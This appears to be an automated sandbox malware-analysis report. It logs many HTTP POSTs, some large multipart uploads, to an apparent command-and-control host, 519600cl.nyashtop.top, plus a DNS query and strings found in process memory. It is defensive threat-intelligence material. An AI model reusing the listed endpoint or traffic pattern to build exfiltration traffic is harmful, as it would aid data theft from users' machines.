Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E1sgvP1u1UWQvSTEwsHkxHIzDjO2165HntUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 165842Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1980Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1980Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----lr6YuXfPDxaSERZDxJvXb4dqDnL3RtDkdJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 310006Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----og0ixSEnZyRMoQjmWcPWW1Msl9xK3bYEUdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 165418Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2576Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----WvSY6bsDXvVhKPYfyFAEsPG1V8KENb75ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 310006Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1972Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2576Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 519600cl.nyashtop.top

Source: unknown

HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: integrator.exe.0.dr	String found in binary or memory: http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte
Source: svchost.exe, 00000039.00000003.2223535604.000001F848818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000039.00000003.2223535604.000001F848818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000039.00000003.2223535604.000001F848818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000039.00000003.2223535604.000001F848818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000039.00000003.2223535604.000001F848818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000039.00000003.2223535604.000001F848818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000039.00000003.2223535604.000001F84884D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000039.00000003.2223535604.000001F848891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000023.00000002.2406346739.0000023FC8DD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2380149744.000002188D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C3BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABC58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC671F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D826000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C9130C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B54D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9D086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687587000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788E066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC91AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: SearchIndexer.exe, 00000001.00000002.1913109715.0000000003888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2380149744.000002188CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C39B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC66FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C91011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9CE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788DE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC8E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2380149744.000002188D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C3BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABC58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC671F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D826000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C9130C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B54D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9D086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687587000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788E066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC91AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000023.00000002.2406346739.0000023FC8DD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2380149744.000002188CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2424810215.00000192C39B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351479480.0000028BABA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2367386836.000001CF3F2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2273115603.000001EC66FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2340732680.000001873D601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2455236974.0000021C91011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2279814980.0000022E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2566609879.00000215B5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2428077401.0000023B9CE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2344843227.000002055E2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2345104737.0000026687361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2363316701.0000019F3E651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2337060315.000002788DE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2404230691.000001FF4A461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2341421226.000001AEC8E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2348354305.0000025C57121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2406346739.0000023FC8BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000039.00000003.2223535604.000001F8488C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000039.00000003.2223535604.000001F848872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000039.00000003.2223535604.000001F8488C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
